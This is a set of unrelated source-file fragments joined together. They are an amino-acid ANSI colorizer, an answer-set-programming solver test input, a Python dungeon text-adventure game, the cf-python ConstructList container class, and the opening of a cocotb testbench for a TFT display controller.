        "bold_white": BOLD_WHITE,
        "bold_blue": BOLD_BLUE,
    }
class ColorAA:
    """Amino-acid colorizer: maps residues to ANSI colors by chemical group."""

    def __init__(self):
        base_groups = [
            ["LVGAIP", "aliphatic", Colors.BOLD_BLUE],
            ["FYW", "aromatic", Colors.BOLD_RED],
            ["SEKDRTNQH", "polar", Colors.BOLD_GREEN],
            ["MCU", "thiol", Colors.BOLD_YELLOW],
        ]
        # Extend each residue set with its lowercase forms.
        self.group = [
            [letters + letters.lower(), label, col]
            for letters, label, col in base_groups
        ]

    def color(self, a):
        # NOTE(review): emits Colors.OFF before the residue and the group
        # color after it — preserved verbatim; confirm this ordering is what
        # the caller's rendering scheme expects.
        for letters, _label, col in self.group:
            if a in letters:
                return Colors.OFF + a + col
        return a
class ColorString:
def __init__(self, seq=None, bgcolor=Colors.OFF, default=Colors.BOLD_RED):
self.bgcolor = bgcolor
self.default = default
self.cind = []
if seq:
self.append(seq)
def append(self, thing, bg=None):
bg = bg if bg else Colors.OFF
if isinstance(thing, FastaEntry):
thing = thing.colseq
if isinstance(thing, ColorString):
newcind = thing.cind
elif isinstance(thing, str):
newcind = []
pos = []
color_on = False
for s in re.split("((?:{})+)".format(Colors.patstr), thing):
if s and s[0] == chr(27):
# if there are multiple colors, take only the last
col = chr(27) + s.split(chr(27))[-1]
# start a new color
if not color_on and col != self.bgcolor:
newcind.append([pos[-1], None, col])
# end old color | |
<filename>tests/asp/weakConstraints/6-still_live-7-1.asp.gringo.test.py<gh_stars>10-100
input = """
1 2 0 0
1 3 0 0
1 4 0 0
1 5 0 0
1 6 0 0
1 7 0 0
1 8 0 0
1 9 0 0
1 10 0 0
1 11 0 0
1 12 0 0
1 13 0 0
1 14 0 0
1 15 0 0
1 16 0 0
1 17 0 0
1 18 0 0
1 19 0 0
1 20 0 0
2 21 3 0 3 22 23 24
1 25 1 0 21
1 1 1 0 25
2 26 3 0 3 23 27 22
1 28 1 0 26
1 1 1 0 28
2 29 3 0 3 27 30 23
1 31 1 0 29
1 1 1 0 31
2 32 3 0 3 30 33 27
1 34 1 0 32
1 1 1 0 34
2 35 3 0 3 22 36 37
1 38 1 0 35
1 1 2 1 24 38
2 39 5 0 3 23 24 37 40 36
2 41 5 0 4 23 24 37 40 36
1 42 2 1 41 39
1 1 2 1 22 42
2 43 5 0 3 27 22 40 44 37
2 45 5 0 4 27 22 40 44 37
1 46 2 1 45 43
1 1 2 1 23 46
2 47 5 0 3 30 23 44 48 40
2 49 5 0 4 30 23 44 48 40
1 50 2 1 49 47
1 1 2 1 27 50
2 51 5 0 3 33 27 48 52 44
2 53 5 0 4 33 27 48 52 44
1 54 2 1 53 51
1 1 2 1 30 54
2 55 3 0 3 30 52 48
1 56 1 0 55
1 1 2 1 33 56
2 57 3 0 3 36 58 24
1 59 1 0 57
1 1 1 0 59
2 60 5 0 3 37 58 24 61 22
2 62 5 0 4 37 58 24 61 22
1 63 2 1 62 60
1 1 2 1 36 63
2 64 8 0 3 40 36 61 22 65 58 23 24
2 66 8 0 4 40 36 61 22 65 58 23 24
1 67 2 1 66 64
1 1 2 1 37 67
2 68 8 0 3 44 37 65 23 69 61 27 22
2 70 8 0 4 44 37 65 23 69 61 27 22
1 71 2 1 70 68
1 1 2 1 40 71
2 72 8 0 3 48 40 69 27 73 65 30 23
2 74 8 0 4 48 40 69 27 73 65 30 23
1 75 2 1 74 72
1 1 2 1 44 75
2 76 8 0 3 52 44 73 30 77 69 33 27
2 78 8 0 4 52 44 73 30 77 69 33 27
1 79 2 1 78 76
1 1 2 1 48 79
2 80 5 0 3 48 77 33 73 30
2 81 5 0 4 48 77 33 73 30
1 82 2 1 81 80
1 1 2 1 52 82
2 83 3 0 3 52 77 33
1 84 1 0 83
1 1 1 0 84
2 85 3 0 3 58 86 36
1 87 1 0 85
1 1 1 0 87
2 88 5 0 3 61 86 36 89 37
2 90 5 0 4 61 86 36 89 37
1 91 2 1 90 88
1 1 2 1 58 91
2 92 8 0 3 65 58 89 37 93 86 40 36
2 94 8 0 4 65 58 89 37 93 86 40 36
1 95 2 1 94 92
1 1 2 1 61 95
2 96 8 0 3 69 61 93 40 97 89 44 37
2 98 8 0 4 69 61 93 40 97 89 44 37
1 99 2 1 98 96
1 1 2 1 65 99
2 100 8 0 3 73 65 97 44 101 93 48 40
2 102 8 0 4 73 65 97 44 101 93 48 40
1 103 2 1 102 100
1 1 2 1 69 103
2 104 8 0 3 77 69 101 48 105 97 52 44
2 106 8 0 4 77 69 101 48 105 97 52 44
1 107 2 1 106 104
1 1 2 1 73 107
2 108 5 0 3 73 105 52 101 48
2 109 5 0 4 73 105 52 101 48
1 110 2 1 109 108
1 1 2 1 77 110
2 111 3 0 3 77 105 52
1 112 1 0 111
1 1 1 0 112
2 113 3 0 3 86 114 58
1 115 1 0 113
1 1 1 0 115
2 116 5 0 3 89 114 58 117 61
2 118 5 0 4 89 114 58 117 61
1 119 2 1 118 116
1 1 2 1 86 119
2 120 8 0 3 93 86 117 61 121 114 65 58
2 122 8 0 4 93 86 117 61 121 114 65 58
1 123 2 1 122 120
1 1 2 1 89 123
2 124 8 0 3 97 89 121 65 125 117 69 61
2 126 8 0 4 97 89 121 65 125 117 69 61
1 127 2 1 126 124
1 1 2 1 93 127
2 128 8 0 3 101 93 125 69 129 121 73 65
2 130 8 0 4 101 93 125 69 129 121 73 65
1 131 2 1 130 128
1 1 2 1 97 131
2 132 8 0 3 105 97 129 73 133 125 77 69
2 134 8 0 4 105 97 129 73 133 125 77 69
1 135 2 1 134 132
1 1 2 1 101 135
2 136 5 0 3 101 133 77 129 73
2 137 5 0 4 101 133 77 129 73
1 138 2 1 137 136
1 1 2 1 105 138
2 139 3 0 3 105 133 77
1 140 1 0 139
1 1 1 0 140
2 141 3 0 3 114 142 86
1 143 1 0 141
1 1 1 0 143
2 144 5 0 3 117 142 86 145 89
2 146 5 0 4 117 142 86 145 89
1 147 2 1 146 144
1 1 2 1 114 147
2 148 8 0 3 121 114 145 89 149 142 93 86
2 150 8 0 4 121 114 145 89 149 142 93 86
1 151 2 1 150 148
1 1 2 1 117 151
2 152 8 0 3 125 117 149 93 153 145 97 89
2 154 8 0 4 125 117 149 93 153 145 97 89
1 155 2 1 154 152
1 1 2 1 121 155
2 156 8 0 3 129 121 153 97 157 149 101 93
2 158 8 0 4 129 121 153 97 157 149 101 93
1 159 2 1 158 156
1 1 2 1 125 159
2 160 8 0 3 133 125 157 101 161 153 105 97
2 162 8 0 4 133 125 157 101 161 153 105 97
1 163 2 1 162 160
1 1 2 1 129 163
2 164 5 0 3 129 161 105 157 101
2 165 5 0 4 129 161 105 157 101
1 166 2 1 165 164
1 1 2 1 133 166
2 167 3 0 3 133 161 105
1 168 1 0 167
1 1 1 0 168
2 169 3 0 3 145 114 117
1 170 1 0 169
1 1 2 1 142 170
2 171 5 0 3 149 142 117 121 114
2 172 5 0 4 149 142 117 121 114
1 173 2 1 172 171
1 1 2 1 145 173
2 174 5 0 3 153 145 121 125 117
2 175 5 0 4 153 145 121 125 117
1 176 2 1 175 174
1 1 2 1 149 176
2 177 5 0 3 157 149 125 129 121
2 178 5 0 4 157 149 125 129 121
1 179 2 1 178 177
1 1 2 1 153 179
2 180 5 0 3 161 153 129 133 125
2 181 5 0 4 161 153 129 133 125
1 182 2 1 181 180
1 1 2 1 157 182
2 | |
<reponame>OJHFire/Uni-text-game
#importing all the other libraries and classes
from ItemsClass import *
from EnemiesClass import *
from time import sleep
from os import system
from random import randint
# defining some global variables
# Player state.
health = 0
failed = False
inventory = []
finished = False
# Number of enemies to place, set from the difficulty in pre_game().
enemy_counter = 0
# Parallel grid marking which rooms have been searched.
search_map = []
# Player position within the level grid.
x = 0
y = 0
current_room = "None"
# Level dimensions; overwritten by user input in pre_game().
width = 6
height = 6
#a function that generates a map to be used to check if a room has been searched
def generate_search_map():
    """Rebuild the global search map as a height x width grid of "" flags.

    Bug fix: the original appended the *same* row list ``height`` times, so
    marking one room as searched would have marked that column in every row.
    Each row is now an independent list.
    """
    global search_map
    search_map = [["" for _ in range(width)] for _ in range(height)]
def slow_print(string):
    """Print *string* (plus a newline) one character at a time."""
    for ch in string + "\n":
        # Flush per character so the typewriter effect is visible.
        print(ch, end="", flush=True)
        sleep(0.000002)
# Default difficulty and the pool of room types used by map generation.
difficulty = "Normal"
rooms = ["empty_room", "great_hall", "tomb", "corridor", "armoury", "kitchen", "torture_chamber", "dining_hall"]
#define weapons using Weapon class
fist = Weapon("Fist", 0, 1, 3, "None")
iron_broadsword = Weapon("Iron Broadsword", 1, 10, 1.5, "Iron")
iron_dagger = Weapon("Iron Dagger", 1, 5, 3, "Iron")
steel_broadsword = Weapon("Steel Broadsword", 2, 20, 1.5, "Steel")
steel_dagger = Weapon("Steel Dagger", 2, 10, 3, "Steel")
iron_warhammer = Weapon("Iron Warhammer", 2, 50, 0.25, "Iron")
steel_warhammer = Weapon("Steel Warhammer", 3, 100, 0.25, "Steel")
iron_waraxe = Weapon("Iron War-Axe", 1, 7, 2, "Iron")
steel_waraxe = Weapon("Steel War-Axe", 2, 20, 2, "Steel")
iron_battleaxe = Weapon("Iron Battle Axe", 2, 30, 0.5, "Iron")
steel_battleaxe = Weapon("Steel Battle Axe", 3, 60, 0.5, "Steel")
weapons = [iron_broadsword, iron_battleaxe, iron_dagger, iron_warhammer, iron_waraxe, steel_warhammer, steel_battleaxe, steel_broadsword, steel_dagger, steel_waraxe]
# Bucket the weapons by rarity tier (1/2/3), preserving list order.
weapons_list1 = [w for w in weapons if w.rarity == 1]
weapons_list2 = [w for w in weapons if w.rarity == 2]
weapons_list3 = [w for w in weapons if w.rarity == 3]
# The player starts unarmed.
weapon = fist
#function to call the menu
def menu():
    """Show the main menu, read a choice, and dispatch to play/scores/quit.

    Invalid input clears the screen and recursively re-shows the menu.
    """
    #print a welcome message to the user
    slow_print("Hello, welcome to the dungeon!")
    slow_print("I hope you enjoy your stay.\n")
    #show a little graphic to spruce up the menu(I am not very good at ascii art so I chose something simple)
    slow_print("""
     /\\
    / \\
    |  |
    |  |
    |  |
    |  |
 ___|  |___
|___    ___|
    |  |
    |____|  """)
    #print out the players options
    slow_print("""
 Play
 Scores
 Quit
""")
    #get an input from player to make a choice
    choice = input("> ")
    #if they chose an item off the menu then it sends them to the related function, else it reprints the menu with a message
    if choice.lower() == "play":
        system('cls')
        play(difficulty)
    elif choice.lower() == "scores":
        system('cls')
        scores()
    elif choice.lower() == "quit":
        system('cls')
        slow_print("GoodBye!")
    else:
        system('cls')
        slow_print("::INVALID COMMAND:: \n")
        sleep(1)
        menu()
def play(difficulty):
    """Show the pre-game menu: start the game, cycle difficulty, or go back.

    The ``difficulty`` parameter shadows the module-level global; the cycled
    value is threaded through recursive calls. NOTE(review): pre_game() reads
    the *global* difficulty, so changes made here may never reach it —
    confirm intended.
    """
    slow_print("Start")
    slow_print("Difficulty: " + difficulty)
    slow_print("Back")
    choice = input("> ")
    if choice.lower() == "start":
        system('cls')
        pre_game()
    elif choice.lower() == "difficulty":
        system('cls')
        # Cycle Normal -> Hard -> Easy -> Normal.
        if difficulty == "Normal":
            difficulty = "Hard"
        elif difficulty == "Hard":
            difficulty = "Easy"
        else:
            difficulty = "Normal"
        play(difficulty)
    elif choice.lower() == "back":
        system('cls')
        menu()
    else:
        system('cls')
        slow_print("INVALID COMMAND")
        play(difficulty)
def scores():
    """Placeholder scores screen: waits for any input, then returns to the menu."""
    system('cls')
    slow_print("Not finished yet")
    input("> ")
    system('cls')
    menu()
def start(level, health, weapon):
    """Main game loop: take turns until the run is finished or has failed.

    Relies on the module globals `finished` and `failed` being set by the
    routines called each turn (e.g. is_exit()).
    """
    # BUG FIX: the original condition `finished != True or failed != True`
    # stays True unless BOTH flags are set, so finishing (or failing) alone
    # never ended the loop.  Loop while neither flag is set instead.
    while not finished and not failed:
        system('cls')
        observe()
        nesw = check_directions()
        slow_print("The available directions are: " + nesw)
        command()
        health += 1  # passive regeneration each turn
        get_location(level)
        is_exit()
def pre_game():
    """Collect map dimensions, build and populate the level, then start a run."""
    global current_room
    global weapon
    global health
    global width
    global height
    global enemy_counter
    # Keep prompting until the map is at least 2x2.
    valid = False
    while valid != True:
        system('cls')
        slow_print("Please input the map width")
        width = int(input("> "))
        system('cls')
        slow_print("Please input the map height")
        height = int(input("> "))
        if width >= 2 and height >= 2:
            valid = True
    # Enemy count scales inversely with difficulty (reads global `difficulty`).
    if difficulty == "Easy":
        enemy_counter = 10
    elif difficulty == "Normal":
        enemy_counter = 5
    elif difficulty == "Hard":
        enemy_counter = 2
    generate_search_map()
    new_map = create_map()
    populate_map(new_map)
    # BUG FIX: read the starting room only after populate_map() has filled the
    # grid; previously current_room was read before population and was always
    # the empty placeholder "" instead of "entrance".
    current_room = level[0][0]
    get_location(level)
    health = 100
    start(level, health, weapon)
def create_map():
    """Build the global `level`: a height x width grid of empty strings.

    Returns the freshly created grid (also bound to the module-global
    `level`).  Reads the module globals `width` and `height`.
    """
    global level
    level = [["" for _ in range(width)] for _ in range(height)]
    return level
def populate_map(level):
    """Fill the level grid with random rooms; entrance top-left, exit bottom-right.

    Reads the module globals `width`, `height` and `rooms`.
    """
    level[0][0] = "entrance"
    # BUG FIX: `level` is indexed [row][col] == [height][width] (see
    # create_map), so the exit cell is level[height-1][width-1]; the original
    # level[width-1][height-1] raised IndexError on non-square maps.
    level[height - 1][width - 1] = "exit"
    # BUG FIX: the original loops ran the first index over range(width) and
    # the second over range(height) — the transpose of the grid layout.
    for row in range(height):
        for col in range(width):
            if level[row][col] == "":
                level[row][col] = rooms[randint(0, len(rooms) - 1)]
def command():
    """Read a non-empty command, split off its first word, and dispatch.

    Everything before the first space is the verb; the remainder (with any
    further spaces removed, matching the original parser) is the parameter.
    """
    user_inp = ""
    while not user_inp:
        user_inp = input("> ").upper()
    verb, _, remainder = user_inp.partition(" ")
    parameter = remainder.replace(" ", "")
    if verb == "MOVE":
        move(parameter)
    elif verb in ["SEARCH", "LOOK"]:
        search()
    elif verb in ["OBSERVE", "DESC", "DESCRIPTION"]:
        observe()
    elif verb in ["DIRECTIONS", "DIR"]:
        nesw = check_directions()
        print("The available directions are: " + nesw)
    elif verb == "EQUIP":
        equip()
    elif verb == "INVENTORY":
        view_inv()
def move(parameter):
    """Move the player one cell N/S/E/W, clamped to the map edges.

    `y` is the row (0 at the top) and `x` the column (0 at the left);
    both are module globals.  Unknown parameters print an error.
    """
    global y
    global x
    if parameter in ["NORTH", "SOUTH", "EAST", "WEST"]:
        if parameter == "NORTH":
            if y != 0:
                y -= 1
            else:
                slow_print("You can not go that way")
        elif parameter == "SOUTH":
            if y != height - 1:
                y += 1
            else:
                slow_print("You can not go that way")
        elif parameter == "EAST":
            if x != width - 1:
                x += 1
            else:
                slow_print("You can not go that way")
        elif parameter == "WEST":
            if x != 0:
                x -= 1
            else:
                slow_print("You can not go that way")
    else:
        system('cls')
        slow_print("MOVE command does not have the parameter " + parameter)
    # Refresh position display and possibly trigger an encounter,
    # whether or not the move succeeded.
    get_location(level)
    combat_counter()
def view_inv():
    """List the names of everything in the global inventory, then wait for input."""
    system('cls')
    slow_print("Inventory:")
    for i in inventory:
        slow_print(i.name)
    input("> ")
def search():
    """Search the current room once; on a d10 roll above 5 a room-tier weapon
    may be found and added to the inventory.

    Each cell can only be searched once (tracked in the global search_map).
    NOTE(review): this function indexes level/search_map as [x][y] while
    move()/create_map() treat the first index as the row (y) — confirm the
    intended convention; for square maps both work.
    """
    system('cls')
    global x
    global y
    roll = randint(0, 10)
    if search_map[x][y] == "":
        search_map[x][y] = "S"
        if level[x][y] == "entrance":
            # The entrance always yields the starter broadsword.
            inventory.append(iron_broadsword)
            slow_print("You found an iron broadsword!")
        if roll > 5:
            if level[x][y] == "corridor":
                slow_print("You can't find anything in the corridor")
            elif level[x][y] in ["kitchen", "empty_room", "dining_hall"]:
                # BUG FIX: randint's upper bound is inclusive, so
                # randint(0, len(list)) could raise IndexError; use len-1.
                pick = randint(0, len(weapons_list1) - 1)
                if weapons_list1[pick] in inventory:
                    slow_print("You didn't find anything")
                else:
                    inventory.append(weapons_list1[pick])
                    slow_print("You found a " + weapons_list1[pick].name)
            elif level[x][y] in ["great_hall", "tomb"]:
                pick = randint(0, len(weapons_list2) - 1)
                if weapons_list2[pick] in inventory:
                    slow_print("You didn't find anything")
                else:
                    # BUG FIX: the original appended the whole weapons_list2
                    # list instead of the selected weapon.
                    inventory.append(weapons_list2[pick])
                    slow_print("You found a " + weapons_list2[pick].name)
            else:
                pick = randint(0, len(weapons_list3) - 1)
                if weapons_list3[pick] in inventory:
                    slow_print("You didn't find anything")
                else:
                    inventory.append(weapons_list3[pick])
                    slow_print("You found a " + weapons_list3[pick].name)
        # BUG FIX: the d10 roll now has its own name (`roll`), so the weapon
        # index chosen above no longer clobbers it before this check.
        if roll <= 5 and level[x][y] != "entrance":
            slow_print("You didnt find anything")
    else:
        slow_print("I don't think I'll find anything else here")
    input("> ")
def observe():
    """Print the description of the global `current_room`.

    Known rooms clear the screen first and print a title line (where one
    exists) followed by the description; unknown rooms get a fallback
    message without clearing the screen.
    """
    descriptions = {
        "corridor": [
            "Corridor: \n",
            "You find yourself in a dark wet corridor, there is just enough light from the torches held\non the wall to make it through without tripping",
        ],
        "armoury": [
            "Armoury: \n",
            "You found yourself in an armoury.\nHowever its really old so there isn't much left, maybe you can find a new weapon if you search the room.",
        ],
        "kitchen": [
            "Kitchen: \n",
            "You found yourself in a kitchen",
        ],
        "entrance": [
            "Entrance: \n",
            "You awake in a brightly lit room, you need to get out...",
        ],
        "exit": [
            "You found the exit!",
        ],
        "great_hall": [
            "Great Hall: \n",
            "You look around to see you're in some sort of hall, probably used for \nspeeches and such when this place was used.",
        ],
        "tomb": [
            "Tomb: \n",
            "It seems to be a tomb with a coffin in the middle, its sealed tight though,\nso don't expect anything to popout.",
        ],
        "torture_chamber": [
            "Torture Chamber: \n",
            "The smell of blood is overpowering in this torture chamber",
        ],
        "empty_room": [
            "Empty looking room: \n",
            "Its a very bare looking room. There doesn't seem to be anything of interest.",
        ],
        "dining_hall": [
            "Dining hall: \n",
            "You walk into the cold dining room, its quite dark only lit by candles on the table.",
        ],
    }
    if current_room in descriptions:
        system('cls')
        for line in descriptions[current_room]:
            slow_print(line)
    else:
        slow_print("This room doesn't seem to have a definition. :(")
def equip():
global weapon
count = 1
system('cls')
slow_print("Weapon list")
for i in inventory:
slow_print(str(count) + ". " + i.name)
count += 1
slow_print("Please type the number of the weapon you would | |
<reponame>sadielbartholomew/cf-python<filename>cf/abstract/constructlist.py
import logging
import cfdm
from ..decorators import (
_deprecated_kwarg_check,
_manage_log_level_via_verbosity,
)
from ..functions import (
_DEPRECATION_ERROR,
_DEPRECATION_ERROR_DICT,
_DEPRECATION_ERROR_KWARGS,
)
from ..mixin_container import Container
# Module-level logger; verbosity is managed via the decorators imported above.
logger = logging.getLogger(__name__)
class ConstructList(list, Container, cfdm.Container):
"""An ordered sequence of constructs.
The elements of the list are construct of the same type.
The list supports the python list-like operations (such as
indexing and methods like `!append`).
>>> fl = cf.{{class}}()
>>> len(fl)
0
>>> fl = cf.FieldList(f)
>>> len(fl)
1
>>> fl = cf.FieldList([f, g])
>>> len(fl)
2
>>> fl = cf.FieldList(cf.FieldList([f] * 3))
>>> len(fl)
3
>>> len(fl + fl)
6
Such methods provide functionality similar to that of a
:ref:`built-in list <python:tut-morelists>`. The main difference
is that when an element needs to be assesed for equality its
`!equals` method is used, rather than the ``==`` operator.
"""
    def __init__(self, constructs=None):
        """**Initialization**
        :Parameters:
            constructs: (sequence of) constructs, optional
                Create a new list with these constructs.  A single
                construct (anything exposing a `construct_type`
                attribute) is appended; any other iterable is treated
                as a sequence of constructs.
        """
        # NOTE(review): super(cfdm.Container, self) deliberately starts the
        # MRO walk *after* cfdm.Container — presumably to skip its __init__;
        # confirm before changing.
        super(cfdm.Container, self).__init__()
        if constructs is not None:
            if getattr(constructs, "construct_type", None) is not None:
                self.append(constructs)
            else:
                self.extend(constructs)
    def __call__(self, *identities):
        """Alias for `cf.{{class}}.select_by_identity`.
        Calling the list selects constructs by identity:
        ``fl(*identities)`` is equivalent to
        ``fl.select_by_identity(*identities)``.
        """
        return self.select_by_identity(*identities)
    def __deepcopy__(self, memo):
        """Called by the `copy.deepcopy` standard library function.
        The *memo* dictionary is ignored because `copy` already
        deep-copies each contained construct.
        """
        return self.copy()
def __repr__(self):
"""Called by the `repr` built-in function.
x.__repr__() <==> repr(x)
"""
out = [repr(f) for f in self]
out = ",\n ".join(out)
return "[" + out + "]"
    def __str__(self):
        """Called by the `str` built-in function.
        x.__str__() <==> str(x)
        Identical to `__repr__`.
        """
        return repr(self)
    def __docstring_method_exclusions__(self):
        """Return the names of methods to exclude from docstring
        substitutions.
        These inherited built-in list methods keep their original
        docstrings, so the ``{{...}}`` substitution machinery must
        skip them.
        See `_docstring_method_exclusions` for details.
        """
        return (
            "append",
            "extend",
            "insert",
            "pop",
            "reverse",
            "clear",
        )
# ----------------------------------------------------------------
# Overloaded list methods
# ----------------------------------------------------------------
    def __add__(self, x):
        """The binary arithmetic operation ``+``
        f.__add__(x) <==> f + x
        :Returns:
            `{{class}}`
                The concatenation of the list and another sequence.
        **Examples:**
        >>> h = f + g
        >>> f += g
        """
        # Re-wrap the plain-list result in this class.
        return type(self)(list.__add__(self, x))
def __contains__(self, y):
"""Called to implement membership test operators.
x.__contains__(y) <==> y in x
{{List comparison}}
Note that ``x in fl`` is equivalent to
``any(f.equals(x) for f in fl)``.
"""
for f in self:
if f.equals(y):
return True
return False
    def __mul__(self, n):
        """The binary arithmetic operation ``*``
        f.__mul__(n) <==> f * n
        :Returns:
            `{{class}}`
                The list added to itself *n* times.
        **Examples:**
        >>> h = f * 2
        >>> f *= 2
        """
        # Re-wrap the plain-list result in this class.
        return type(self)(list.__mul__(self, n))
    def __eq__(self, other):
        """The rich comparison operator ``==``
        f.__eq__(x) <==> f == x
        {{List comparison}}
        Note that ``f == x`` is equivalent to ``f.equals(x)``.
        :Returns:
            `bool`
        """
        return self.equals(other)
    def __getslice__(self, i, j):
        """Called to implement evaluation of f[i:j]
        f.__getslice__(i, j) <==> f[i:j]
        NOTE(review): ``__getslice__`` is a Python 2 protocol; under
        Python 3 slicing is routed through `__getitem__` and this
        method is never called.
        :Returns:
            `{{class}}`
                Slice of the list from *i* to *j*.
        **Examples:**
        >>> g = f[0:1]
        >>> g = f[1:-4]
        >>> g = f[:1]
        >>> g = f[1:]
        """
        return type(self)(list.__getslice__(self, i, j))
    def __getitem__(self, index):
        """Called to implement evaluation of f[index]
        f.__getitem_(index) <==> f[index]
        :Returns:
            If *index* is an integer then the corresponding list
            element is returned. If *index* is a slice then a new
            {{class}} is returned, which may be empty.
        **Examples:**
        >>> g = f[0]
        >>> g = f[-1:-4:-1]
        >>> g = f[2:2:2]
        """
        out = list.__getitem__(self, index)
        # list.__getitem__ returns a plain list for slices; re-wrap it.
        if isinstance(out, list):
            return type(self)(out)
        return out
    def __ne__(self, other):
        """The rich comparison operator ``!=``
        f.__ne__(x) <==> f != x
        {{List comparison}}
        Note that ``f != x`` is equivalent to ``not f.equals(x)``.
        :Returns:
            `bool`
        """
        return not self.equals(other)
# ???
__len__ = list.__len__
__setitem__ = list.__setitem__
append = list.append
extend = list.extend
insert = list.insert
pop = list.pop
reverse = list.reverse
sort = list.sort
    def close(self):
        """Close all files referenced by each construct in the list.
        Note that a closed file will be automatically reopened if its
        contents are subsequently required.
        :Returns:
            `None`
        **Examples:**
        >>> f.close()
        """
        for f in self:
            f.close()
def count(self, value):
"""Return the number of occurrences of value.
{{List comparison}}
Note that ``fl.count(value)`` is equivalent to
``sum(f.equals(value) for f in fl)``.
.. seealso:: `list.count`
**Examples:**
>>> f = cf.{{class}}([a, b, c, a])
>>> f.count(a)
2
>>> f.count(b)
1
>>> f.count('a string')
0
"""
return len([None for f in self if f.equals(value)])
    def index(self, value, start=0, stop=None):
        """Return first index of value.
        {{List comparison}}
        An exception is raised if there is no such construct.
        .. seealso:: `list.index`
        :Parameters:
            value:
                The construct to find, compared via its `!equals` method.
            start: `int`, optional
                Begin the search at this (possibly negative) index.
            stop: `int` or `None`, optional
                Stop before this (possibly negative) index; by default
                search to the end of the list.
        :Returns:
            `int`
                The index of the first matching construct.
        """
        # Normalise negative bounds to absolute positions.
        if start < 0:
            start = len(self) + start
        if stop is None:
            stop = len(self)
        elif stop < 0:
            stop = len(self) + stop
        for i, f in enumerate(self[start:stop]):
            if f.equals(value):
                return i + start
        raise ValueError(
            "{0!r} is not in {1}".format(value, self.__class__.__name__)
        )
    def remove(self, value):
        """Remove first occurrence of value.
        {{List comparison}}
        A `ValueError` is raised if there is no matching construct.
        .. seealso:: `list.remove`
        """
        for i, f in enumerate(self):
            if f.equals(value):
                del self[i]
                return
        raise ValueError(
            "{0}.remove(x): x not in {0}".format(self.__class__.__name__)
        )
    def sort(self, key=None, reverse=False):
        """Sort of the list in place.
        By default the list is sorted by the identities of its constructs,
        but any sort criteria can be specified with the *key* parameter.
        The sort is stable.
        .. versionadded:: 1.0.4
        .. seealso:: `reverse`
        :Parameters:
            key: function, optional
                Specify a function of one argument that is used to extract
                a comparison key from each construct. By default the list
                is sorted by construct identity, i.e. the default value of
                *key* is ``lambda x: x.identity()``.
            reverse: `bool`, optional
                If set to `True`, then the list elements are sorted as if
                each comparison were reversed.
        :Returns:
            `None`
        """
        if key is None:
            key = lambda f: f.identity()
        # Delegate to list.sort with the (possibly defaulted) key.
        return super().sort(key=key, reverse=reverse)
    def copy(self, data=True):
        """Return a deep copy.
        ``f.copy()`` is equivalent to ``copy.deepcopy(f)``.
        :Parameters:
            data: `bool`, optional
                If False then do not copy the data of the constructs
                (passed through to each construct's own `!copy`).
        :Returns:
            The deep copy.
        **Examples:**
        >>> g = f.copy()
        >>> g is f
        False
        >>> f.equals(g)
        True
        >>> import copy
        >>> h = copy.deepcopy(f)
        >>> h is f
        False
        >>> f.equals(g)
        True
        """
        return type(self)([f.copy(data=data) for f in self])
@_deprecated_kwarg_check("traceback")
@_manage_log_level_via_verbosity
def equals(
self,
other,
rtol=None,
atol=None,
verbose=None,
ignore_data_type=False,
ignore_fill_value=False,
ignore_properties=(),
ignore_compression=False,
ignore_type=False,
ignore=(),
traceback=False,
unordered=False,
):
"""Whether two lists are the same.
Equality requires the two lists to have the same length and for
the construct elements to be equal pair-wise, using their
`!equals` methods.
Any type of object may be tested but, in general, equality is only
possible with another {{class}}, or a subclass of one. See the
*ignore_type* parameter.
Equality is between the constructs is strict by default. This
means that for two constructs to be considered equal they must
have corresponding metadata constructs and for each pair of
constructs:
* the same descriptive properties must be present, with the same
values and data types, and vector-valued properties must also
have same the size and be element-wise equal (see the
*ignore_properties* and *ignore_data_type* parameters), and
..
* if there are data arrays then they must have same shape and data
type, the same missing data mask, and be element-wise equal (see
the *ignore_data_type* parameter).
{{equals tolerance}}
If data arrays are compressed then the compression type and the
underlying compressed arrays must be the same, as well as the
arrays in their uncompressed forms. See the *ignore_compression*
parameter.
NetCDF elements, such as netCDF variable and dimension names, do
not constitute part of the CF data model and so are not checked on
any construct.
:Parameters:
other:
The object to compare for equality.
{{atol: number, optional}}
{{rtol: number, optional}}
{{ignore_fill_value: `bool`, optional}}
{{verbose: `int` or `str` or `None`, optional}}
ignore_properties: sequence of `str`, optional
The names of properties of the field construct (not the TODO
metadata constructs) to omit from the comparison. Note
that the "Conventions" property is always omitted by
default.
{{ignore_data_type: `bool`, optional}}
{{ignore_compression: `bool`, optional}}
unordered: `bool`, optional
If True then test that the lists contain equal
constructs in any relative order. By default, construct
order matters for the list comparison, such that each
construct is tested for equality with the construct
at the corresponding position in the list, pair-wise.
:Returns:
`bool`
Whether the two lists are equal.
**Examples:**
>>> fl.equals(fl)
True
>>> fl.equals(fl.copy())
| |
<gh_stars>10-100
import os
import sys
import cocotb
import logging
from cocotb.result import TestFailure
from cocotb.clock import Clock
import time
from array import array as Array
from cocotb.triggers import Timer, FallingEdge
from cocotb.drivers.amba import AXI4LiteMaster
from cocotb.drivers.amba import AXI4StreamMaster
CLK_PERIOD = 10
MODULE_PATH = os.path.join(os.path.dirname(__file__), os.pardir, "rtl")
MODULE_PATH = os.path.abspath(MODULE_PATH)
REG_CONTROL = 0 << 2
REG_STATUS = 1 << 2
REG_COMMAND_DATA = 2 << 2
REG_IMAGE_WIDTH = 3 << 2
REG_IMAGE_HEIGHT = 4 << 2
REG_IMAGE_SIZE = 5 << 2
REG_VERSION = 6 << 2
BIT_CONTROL_ENABLE = 0
BIT_CONTROL_ENABLE_INTERRUPT = 1
BIT_CONTROL_COMMAND_MODE = 2
BIT_CONTROL_BACKLIGHT_ENABLE = 3
BIT_CONTROL_RESET_DISPLAY = 4
BIT_CONTROL_COMMAND_WRITE = 5
BIT_CONTROL_COMMAND_READ = 6
BIT_CONTROL_COMMAND_PARAMETER = 7
BIT_CONTROL_WRITE_OVERRIDE = 8
BIT_CONTROL_CHIP_SELECT = 9
BIT_CONTROL_ENABLE_TEARING = 10
BIT_CONTROL_TP_RED = 12
BIT_CONTROL_TP_GREEN = 13
BIT_CONTROL_TP_BLUE = 14
MEM_ADR_RESET = 0x01
"""
Functions Required for checking out PMOD TFT
1. Write to the controller chip internal register
2. Read from the controller chip internall register
3. Video Frame Successfully is sent from the memory
to the controller chip
4. Video Frames are continually sent out
"""
WIDTH = 8
HEIGHT = 4
H_BLANK = 40
V_BLANK = 200
def setup_dut(dut):
    """Start a free-running clock on the DUT (forked to run in the background)."""
    cocotb.fork(Clock(dut.clk, CLK_PERIOD).start())
@cocotb.test(skip = True)
def write_to_controller(dut):
    """
